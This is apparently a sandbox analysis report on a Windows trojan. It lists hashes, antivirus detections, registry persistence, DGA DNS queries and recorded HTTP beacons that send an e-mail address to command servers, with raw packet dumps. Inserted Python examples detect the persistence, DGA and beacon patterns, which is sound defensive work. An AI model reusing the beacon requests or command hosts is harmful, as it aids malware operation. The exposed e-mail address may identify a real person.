Analysis Date: 2015-08-27 05:18:33
MD5: 67e50e7fcd9a4aaacd773e49b2a703ab
SHA1: e1a387a69d8e8b3e8bcf7bee8282e34eea8d63be

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 6a4c940cd05aeccb27b685dbfeda3179 sha1: 04515d8d55839703198a7abc01f59f9508da2b8a size: 293376
Section .rdata: md5: d07b49505e056415d97c37a7d8ff8d2e sha1: 6fe2bbe6363af6599739564c855228dad29b75fa size: 34304
Section .data: md5: 970ac531ed74e941560292d89fb11e01 sha1: 3311096ef44f749d9923332801e4bd1b5ae30d33 size: 94208
Timestamp: 2014-10-30 09:48:57
Packer: Microsoft Visual C++ ?.?
PEhash: 0540d536b7c7228de96cc76a1bcdd8da1a6d4d40
IMPhash: 27804559539e81eeddd79bbef120a6fc
AV CA (E-Trust Ino): no_virus
AV F-Secure: Gen:Variant.Symmi.22722
AV Dr. Web: Trojan.DownLoader15.29683
AV ClamAV: no_virus
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV BullGuard: Gen:Variant.Symmi.22722
AV Padvish: no_virus
AV VirusBlokAda (vba32): no_virus
AV CAT (quickheal): Trojan.Dynamer.AC3
AV Trend Micro: TSPY_NIVDORT.SMB
AV Kaspersky: Trojan.Win32.Generic
AV Zillya!: no_virus
AV Emsisoft: Gen:Variant.Symmi.22722
AV Ikarus: Trojan.FBAccountLock
AV Frisk (f-prot): no_virus
AV Authentium: W32/Wonton.B.gen!Eldorado
AV MalwareBytes: Trojan.Zbot.WHE
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV Microsoft Security Essentials: TrojanSpy:Win32/Nivdort.BD
AV K7: Trojan ( 004cb2771 )
AV BitDefender: Gen:Variant.Symmi.22722
AV Fortinet: W32/Agent.VNC!tr
AV Symantec: Downloader.Upatre!g15
AV Grisoft (avg): Win32/Cryptor
AV Eset (nod32): Win32/Agent.VNC
AV Alwil (avast): Downloader-TLD [Trj]
AV Ad-Aware: Gen:Variant.Symmi.22722
AV Twister: Trojan.Agent.VNC.aanx.mg
AV Avira (antivir): BDS/Zegost.Gen4
AV Mcafee: Trojan-FEMT!67E50E7FCD9A
AV Rising: 0x580445a0

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Video BranchCache DLL Offline Network ➝ C:\Documents and Settings\Administrator\Application Data\syodwtlvldr\ssvpbhcutyqc.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\syodwtlvldr\ssvpbhcutyqc.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\syodwtlvldr\ssvpbhcutyqc.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\syodwtlvldr\ssvpbhcutyqc.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\syodwtlvldr\baxuvpcls.exe
Creates File: \Device\Afd\Endpoint (a socket handle opened through the AFD driver, not a file on disk)
Creates File: C:\Documents and Settings\Administrator\Application Data\syodwtlvldr\ssvpbhcutyqc.lmrti
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\syodwtlvldr\ssvpbhcutyqc.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\syodwtlvldr\ssvpbhcutyqc.exe"
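The persistence chain above has three traits worth checking for on any host: the Run value points at an executable under the user's Application Data directory, the directory and file names look machine-generated, and the value name borrows Windows component vocabulary ("BranchCache", "DLL", "Network") that the image path does not back up; the dropped copy then relaunches its own image with a WATCHDOGPROC argument. The Python below is an added example, not part of this report or of the sandbox that produced it. It transcribes the events above as constructed input and applies those checks; the event tuples, the user-writable path patterns, the vocabulary list and the randomness thresholds (vowel ratio below 0.25 or a consonant run of five or more) are this example's own assumptions.

```python
"""Triage of the persistence and process events listed above (added example)."""
import re
from typing import List, Tuple

# Runtime events transcribed from the report above (constructed input for this example).
# Each tuple: (acting process, action, target, registry value data or None).
APPDIR = r"C:\Documents and Settings\Administrator\Application Data\syodwtlvldr"
EVENTS = [
    (r"C:\malware.exe", "Registry",
     r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Video BranchCache DLL Offline Network",
     APPDIR + r"\ssvpbhcutyqc.exe"),
    (r"C:\malware.exe", "Creates File", APPDIR + r"\ssvpbhcutyqc.exe", None),
    (r"C:\malware.exe", "Creates Process", APPDIR + r"\ssvpbhcutyqc.exe", None),
    (APPDIR + r"\ssvpbhcutyqc.exe", "Creates File", APPDIR + r"\baxuvpcls.exe", None),
    (APPDIR + r"\ssvpbhcutyqc.exe", "Creates File", APPDIR + r"\ssvpbhcutyqc.lmrti", None),
    (APPDIR + r"\ssvpbhcutyqc.exe", "Creates Process",
     'WATCHDOGPROC "' + APPDIR + r'\ssvpbhcutyqc.exe"', None),
]

# Heuristic patterns and thresholds chosen for this example.
USER_WRITABLE = re.compile(r"\\(Application Data|AppData|Local Settings|Temp|Users)\\", re.I)
WINDOWS_WORDS = {"dll", "network", "branchcache", "offline", "service", "update", "driver", "host"}
VOWELS = set("aeiou")


def looks_random(name: str) -> bool:
    """Machine-generated names tend to have few vowels or long consonant runs."""
    letters = "".join(c for c in name.lower() if c.isalpha())
    if len(letters) < 6:
        return False
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters)
    longest_run = max(len(run) for run in re.findall(r"[^aeiou]+", letters))
    return vowel_ratio < 0.25 or longest_run >= 5


def triage_run_value(value_name: str, image: str) -> List[str]:
    """Reasons a Run-key entry deserves a closer look; an empty list means nothing odd."""
    reasons = []
    if USER_WRITABLE.search(image):
        reasons.append("autostart image lives under a user-writable profile directory")
    parts = image.split("\\")
    directory, exe = parts[-2], parts[-1].rsplit(".", 1)[0]
    if looks_random(directory):
        reasons.append(f"directory name {directory!r} looks machine-generated")
    if looks_random(exe):
        reasons.append(f"executable name {exe!r} looks machine-generated")
    if WINDOWS_WORDS & set(value_name.lower().split()) and not re.search(r"\\(Windows|Program Files)", image, re.I):
        reasons.append("value name borrows Windows component vocabulary but image is outside system directories")
    return reasons


def image_from_command(command: str) -> str:
    """Pull the executable path out of a command line, honouring quoted paths."""
    m = re.search(r'"([^"]*\.exe)"', command, re.I)
    if m:
        return m.group(1)
    if command.lower().endswith(".exe"):
        return command
    m = re.search(r"(\S+\.exe)", command, re.I)
    return m.group(1) if m else command


def find_self_relaunch(events) -> List[Tuple[str, str]]:
    """Processes that start their own image again with extra arguments (watchdog pattern)."""
    hits = []
    for actor, action, target, _ in events:
        if action == "Creates Process" and target != actor:
            if image_from_command(target).lower() == actor.lower():
                hits.append((actor, target.split()[0]))
    return hits


def triage(events):
    """Apply both checks: ({run value name: reasons}, [(process, watchdog argument)])."""
    run_findings = {}
    for _actor, action, target, data in events:
        if action == "Registry" and "\\CurrentVersion\\Run\\" in target and data:
            value_name = target.rsplit("\\", 1)[1]
            run_findings[value_name] = triage_run_value(value_name, data)
    return run_findings, find_self_relaunch(events)


if __name__ == "__main__":
    findings, watchdogs = triage(EVENTS)
    for name, reasons in findings.items():
        print(f"Run value {name!r}:")
        for reason in reasons:
            print("  -", reason)
    for actor, argument in watchdogs:
        print(f"self-relaunch with argument {argument!r}: {actor}")
```

On a live host the same checks apply to the output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` and to process-creation telemetry; the thresholds are a starting point and will flag some legitimate installers that use random temp names, so treat a hit as a prompt to look, not a verdict.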

Network Details:

DNS: simplechoose.net (A) ➝ 123.108.108.168
DNS: possibleperiod.net (A) ➝ 192.64.119.216
DNS: finishperiod.net (A) ➝ 50.63.202.32
DNS: severadifference.net (A) ➝ 95.211.230.75
DNS: probablystorm.net (A), no answer recorded
DNS: sweetthrown.net (A), no answer recorded
DNS: probablythrown.net (A), no answer recorded
DNS: severalhunger.net (A), no answer recorded
DNS: materialhunger.net (A), no answer recorded
DNS: severaltraining.net (A), no answer recorded
DNS: materialtraining.net (A), no answer recorded
DNS: severalstorm.net (A), no answer recorded
DNS: materialstorm.net (A), no answer recorded
DNS: severalthrown.net (A), no answer recorded
DNS: materialthrown.net (A), no answer recorded
DNS: severachoose.net (A), no answer recorded
DNS: laughchoose.net (A), no answer recorded
DNS: severaalthough.net (A), no answer recorded
DNS: laughalthough.net (A), no answer recorded
DNS: severaperiod.net (A), no answer recorded
DNS: laughperiod.net (A), no answer recorded
DNS: severahowever.net (A), no answer recorded
DNS: laughhowever.net (A), no answer recorded
DNS: motherchoose.net (A), no answer recorded
DNS: simplealthough.net (A), no answer recorded
DNS: motheralthough.net (A), no answer recorded
DNS: simpleperiod.net (A), no answer recorded
DNS: motherperiod.net (A), no answer recorded
DNS: simplehowever.net (A), no answer recorded
DNS: motherhowever.net (A), no answer recorded
DNS: mountainchoose.net (A), no answer recorded
DNS: possiblechoose.net (A), no answer recorded
DNS: mountainalthough.net (A), no answer recorded
DNS: possiblealthough.net (A), no answer recorded
DNS: mountainperiod.net (A), no answer recorded
DNS: mountainhowever.net (A), no answer recorded
DNS: possiblehowever.net (A), no answer recorded
DNS: perhapschoose.net (A), no answer recorded
DNS: windowchoose.net (A), no answer recorded
DNS: perhapsalthough.net (A), no answer recorded
DNS: windowalthough.net (A), no answer recorded
DNS: perhapsperiod.net (A), no answer recorded
DNS: windowperiod.net (A), no answer recorded
DNS: perhapshowever.net (A), no answer recorded
DNS: windowhowever.net (A), no answer recorded
DNS: winterchoose.net (A), no answer recorded
DNS: subjectchoose.net (A), no answer recorded
DNS: winteralthough.net (A), no answer recorded
DNS: subjectalthough.net (A), no answer recorded
DNS: winterperiod.net (A), no answer recorded
DNS: subjectperiod.net (A), no answer recorded
DNS: winterhowever.net (A), no answer recorded
DNS: subjecthowever.net (A), no answer recorded
DNS: finishchoose.net (A), no answer recorded
DNS: leavechoose.net (A), no answer recorded
DNS: finishalthough.net (A), no answer recorded
DNS: leavealthough.net (A), no answer recorded
DNS: leaveperiod.net (A), no answer recorded
DNS: finishhowever.net (A), no answer recorded
DNS: leavehowever.net (A), no answer recorded
DNS: sweetchoose.net (A), no answer recorded
DNS: probablychoose.net (A), no answer recorded
DNS: sweetalthough.net (A), no answer recorded
DNS: probablyalthough.net (A), no answer recorded
DNS: sweetperiod.net (A), no answer recorded
DNS: probablyperiod.net (A), no answer recorded
DNS: sweethowever.net (A), no answer recorded
DNS: probablyhowever.net (A), no answer recorded
DNS: severalchoose.net (A), no answer recorded
DNS: materialchoose.net (A), no answer recorded
DNS: severalalthough.net (A), no answer recorded
DNS: materialalthough.net (A), no answer recorded
DNS: severalperiod.net (A), no answer recorded
DNS: materialperiod.net (A), no answer recorded
DNS: severalhowever.net (A), no answer recorded
DNS: materialhowever.net (A), no answer recorded
DNS: severasingle.net (A), no answer recorded
DNS: laughsingle.net (A), no answer recorded
DNS: severacharge.net (A), no answer recorded
DNS: laughcharge.net (A), no answer recorded
DNS: laughdifference.net (A), no answer recorded
DNS: severaevery.net (A), no answer recorded
DNS: laughevery.net (A), no answer recorded
DNS: simplesingle.net (A), no answer recorded
DNS: mothersingle.net (A), no answer recorded
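Every one of the 85 names queried above is two concatenated English words under .net, and the same first words ("several", "laugh", "window", ...) recur with the same second words ("choose", "although", "period", "however", ...), which is the word-pair DGA pattern consistent with the TSPY_NIVDORT / Nivdort.BD detections in the AV section. Only four of the names resolved. The Python below is an added example, not part of this report, that recovers the two vocabularies from the query set alone, with no wordlist: a real first word branches into many different continuations ("severa" is followed by c, a, p, h, l, ...), whereas a fragment such as "sever" is always followed by the same letter, and a second word is a remainder shared by several labels once first words are stripped. The domain list is transcribed from the report; the minimum part length, the sharing threshold and the 80% verdict cut-off are this example's own assumptions.

```python
"""Unsupervised check for word-pair (dictionary) DGA domains (added example)."""
from collections import Counter, defaultdict

# The 85 A-record queries from the report above, in order (constructed transcription).
DNS_QUERIES = """
simplechoose.net possibleperiod.net finishperiod.net severadifference.net probablystorm.net
sweetthrown.net probablythrown.net severalhunger.net materialhunger.net severaltraining.net
materialtraining.net severalstorm.net materialstorm.net severalthrown.net materialthrown.net
severachoose.net laughchoose.net severaalthough.net laughalthough.net severaperiod.net
laughperiod.net severahowever.net laughhowever.net motherchoose.net simplealthough.net
motheralthough.net simpleperiod.net motherperiod.net simplehowever.net motherhowever.net
mountainchoose.net possiblechoose.net mountainalthough.net possiblealthough.net mountainperiod.net
mountainhowever.net possiblehowever.net perhapschoose.net windowchoose.net perhapsalthough.net
windowalthough.net perhapsperiod.net windowperiod.net perhapshowever.net windowhowever.net
winterchoose.net subjectchoose.net winteralthough.net subjectalthough.net winterperiod.net
subjectperiod.net winterhowever.net subjecthowever.net finishchoose.net leavechoose.net
finishalthough.net leavealthough.net leaveperiod.net finishhowever.net leavehowever.net
sweetchoose.net probablychoose.net sweetalthough.net probablyalthough.net sweetperiod.net
probablyperiod.net sweethowever.net probablyhowever.net severalchoose.net materialchoose.net
severalalthough.net materialalthough.net severalperiod.net materialperiod.net severalhowever.net
materialhowever.net severasingle.net laughsingle.net severacharge.net laughcharge.net
laughdifference.net severaevery.net laughevery.net simplesingle.net mothersingle.net
""".split()


def learn_prefix_words(labels, min_part=3):
    """Prefixes followed by at least two different characters across the label set.
    A first word like 'several' branches into many second words; a fragment such
    as 'sever' is always followed by 'a' and is rejected."""
    following = defaultdict(set)
    for label in labels:
        for i in range(min_part, len(label) - min_part + 1):
            following[label[:i]].add(label[i])
    return {prefix for prefix, nxt in following.items() if len(nxt) >= 2}


def factor_word_pairs(labels, min_part=3, min_shared=2):
    """Map each label to (first word, second word). The second word is the remainder
    after a learned first word, accepted when at least `min_shared` labels share it
    (the label itself counts, so 2 means one other label agrees). Ties between
    candidate splits go to the shortest first word."""
    labels = list(dict.fromkeys(labels))
    words = learn_prefix_words(labels, min_part)
    splits = {
        label: sorted(
            ((p, label[len(p):]) for p in words
             if label.startswith(p) and len(label) - len(p) >= min_part),
            key=lambda ps: len(ps[0]))
        for label in labels
    }
    remainders = Counter()
    for candidates in splits.values():
        remainders.update({r for _, r in candidates})   # each label counts a remainder once
    result = {}
    for label, candidates in splits.items():
        if candidates:
            best = max(candidates, key=lambda ps: remainders[ps[1]])   # first max = shortest prefix
            if remainders[best[1]] >= min_shared:
                result[label] = best
    return result


def dga_verdict(domains, threshold=0.8):
    """Factor the registrable labels and report the learned vocabularies and a verdict."""
    labels = [d.split(".")[0] for d in domains]
    pairs = factor_word_pairs(labels)
    fraction = len(pairs) / len(labels) if labels else 0.0
    return {
        "fraction_word_pairs": fraction,
        "is_dictionary_dga": fraction >= threshold,
        "first_words": sorted({p for p, _ in pairs.values()}),
        "second_words": sorted({s for _, s in pairs.values()}),
        "pairs": pairs,
    }


if __name__ == "__main__":
    verdict = dga_verdict(DNS_QUERIES)
    print(f"{verdict['fraction_word_pairs']:.0%} of labels factor into shared word pairs")
    print("first words: ", ", ".join(verdict["first_words"]))
    print("second words:", ", ".join(verdict["second_words"]))
```

Run over this report the factoring recovers 16 first words and 12 second words from 85 queries with no external dictionary, which is what makes the technique usable on a DNS log where the wordlist of a given family is not known in advance; a burst of NXDOMAIN responses for names that all factor this way is the detection signal. The cut-offs and the single-label assumption (`d.split(".")[0]`) are deliberately simple and should be tuned on real resolver traffic.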
HTTP GET: http://simplechoose.net/index.php?email=celine@deltachems.com&method=post&len
User-Agent: (no header sent)
HTTP GET: http://possibleperiod.net/index.php?email=celine@deltachems.com&method=post&len
User-Agent: (no header sent)
HTTP GET: http://finishperiod.net/index.php?email=celine@deltachems.com&method=post&len
User-Agent: (no header sent)
HTTP GET: http://severadifference.net/index.php?email=celine@deltachems.com&method=post&len
User-Agent: (no header sent)
Flow TCP: 192.168.1.1:1031 ➝ 123.108.108.168:80
Flow TCP: 192.168.1.1:1032 ➝ 192.64.119.216:80
Flow TCP: 192.168.1.1:1033 ➝ 50.63.202.32:80
Flow TCP: 192.168.1.1:1034 ➝ 95.211.230.75:80

Raw Pcap (HTTP request payloads, one per flow above)
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d63656c 696e6540 64656c74   mail=celine@delt
0x00000020 (00032)   61636865 6d732e63 6f6d266d 6574686f   achems.com&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 696d706c   ose..Host: simpl
0x00000070 (00112)   6563686f 6f73652e 6e65740d 0a0d0a     echoose.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d63656c 696e6540 64656c74   mail=celine@delt
0x00000020 (00032)   61636865 6d732e63 6f6d266d 6574686f   achems.com&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2070 6f737369   ose..Host: possi
0x00000070 (00112)   626c6570 6572696f 642e6e65 740d0a0d   bleperiod.net...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d63656c 696e6540 64656c74   mail=celine@delt
0x00000020 (00032)   61636865 6d732e63 6f6d266d 6574686f   achems.com&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2066 696e6973   ose..Host: finis
0x00000070 (00112)   68706572 696f642e 6e65740d 0a0d0a0d   hperiod.net.....
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d63656c 696e6540 64656c74   mail=celine@delt
0x00000020 (00032)   61636865 6d732e63 6f6d266d 6574686f   achems.com&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 65766572   ose..Host: sever
0x00000070 (00112)   61646966 66657265 6e63652e 6e65740d   adifference.net.
0x00000080 (00128)   0a0d0a                                ...
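The four dumps are the same request with only the Host header changed, and the request itself carries the indicators a detection would key on: an e-mail address in the clear in the query string, `method=post` on what is actually a GET, a `len` parameter sent without a value, HTTP/1.0 with `Connection: close`, and no User-Agent header at all. The Python below is an added example, not part of this report, that decodes the report's hexdump format (offset, decimal offset in parentheses, up to four 32-bit hex groups, ASCII column) back to bytes, parses the HTTP request, and extracts those indicators. The first dump is embedded verbatim as constructed input; the summary keys are this example's own naming.

```python
"""Decode the report's raw-pcap hex dump and inspect the beacon request (added example)."""
import re
from urllib.parse import parse_qs, urlsplit

# First dump from the report above, copied verbatim (constructed input for this example).
RAW_DUMP = """\
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d63656c 696e6540 64656c74   mail=celine@delt
0x00000020 (00032)   61636865 6d732e63 6f6d266d 6574686f   achems.com&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 696d706c   ose..Host: simpl
0x00000070 (00112)   6563686f 6f73652e 6e65740d 0a0d0a     echoose.net....
"""

# One dump line: hex offset, decimal offset in parentheses, then up to four hex groups
# separated by single spaces. The ASCII column follows after wider spacing and is ignored.
DUMP_LINE = re.compile(r"^\s*0x[0-9a-f]+\s+\(\d+\)\s+((?:[0-9a-f]{2,8} ){0,3}[0-9a-f]{2,8})", re.I)


def decode_hexdump(dump: str) -> bytes:
    """Rebuild the payload bytes from hexdump lines in the report's format."""
    out = bytearray()
    for line in dump.splitlines():
        m = DUMP_LINE.match(line)
        if m:
            out += bytes.fromhex(m.group(1).replace(" ", ""))
    return bytes(out)


def parse_http_request(raw: bytes):
    """Split an HTTP/1.x request head into (method, path, query dict, headers dict)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    return method, url.path, parse_qs(url.query, keep_blank_values=True), headers


def beacon_summary(raw: bytes) -> dict:
    """Indicators worth recording for this check-in: destination, the e-mail address
    leaked in the query, parameters sent without a value, and whether a User-Agent
    header was present at all."""
    method, path, query, headers = parse_http_request(raw)
    email = query.get("email", [""])[0]
    return {
        "method": method,
        "host": headers.get("host"),
        "path": path,
        "email_param": email if "@" in email else None,
        "claimed_method": query.get("method", [None])[0],
        "blank_params": sorted(k for k, v in query.items() if v == [""]),
        "user_agent_present": "user-agent" in headers,
    }


if __name__ == "__main__":
    payload = decode_hexdump(RAW_DUMP)
    print(payload.decode("latin-1"))
    for key, value in beacon_summary(payload).items():
        print(f"{key:>20}: {value}")
```

The same decoder works on the other three dumps, which differ only in the Host value and in trailing CRLF count. A proxy or IDS rule built from this summary would match on `GET` to `/index.php` with an `email=` parameter, the absent User-Agent and HTTP/1.0, rather than on the hostnames, since the DNS section shows the names rotate.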


Strings